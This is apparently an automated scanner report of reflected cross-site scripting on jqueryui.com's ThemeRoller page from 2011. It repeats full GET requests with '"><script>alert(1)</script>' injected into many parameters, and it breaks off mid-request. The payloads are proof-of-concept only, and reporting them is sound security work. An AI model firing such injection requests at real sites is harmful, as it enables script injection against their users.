GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png43e7a"><script>alert(1)</script>363200d54d4&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75604"><script>alert(1)</script>ba263e0ed7c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png75604"><script>alert(1)</script>ba263e0ed7c&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9556f"><script>alert(1)</script>e4c26e517e3 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png9556f"><script>alert(1)</script>e4c26e517e3&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ba1"><script>alert(1)</script>72d1a61f66b was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png86ba1"><script>alert(1)</script>72d1a61f66b&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ad96"><script>alert(1)</script>adb4bcaf6ab was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png6ad96"><script>alert(1)</script>adb4bcaf6ab&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd60"><script>alert(1)</script>1fc4e4ea6f4 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.pngbdd60"><script>alert(1)</script>1fc4e4ea6f4&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 119b8"><script>alert(1)</script>1d4c850f75b was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png119b8"><script>alert(1)</script>1d4c850f75b&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3967f"><script>alert(1)</script>06e01fad325 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png3967f"><script>alert(1)</script>06e01fad325&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b598f"><script>alert(1)</script>9b666fce69d was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngb598f"><script>alert(1)</script>9b666fce69d&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120110
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d6e"><script>alert(1)</script>f49d4a88311 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e768d6e"><script>alert(1)</script>f49d4a88311&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425e2"><script>alert(1)</script>1e60faee7e4 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2425e2"><script>alert(1)</script>1e60faee7e4&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9910"><script>alert(1)</script>45b756f1365 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbecd9910"><script>alert(1)</script>45b756f1365&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9875"><script>alert(1)</script>ed090a1eadc was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.p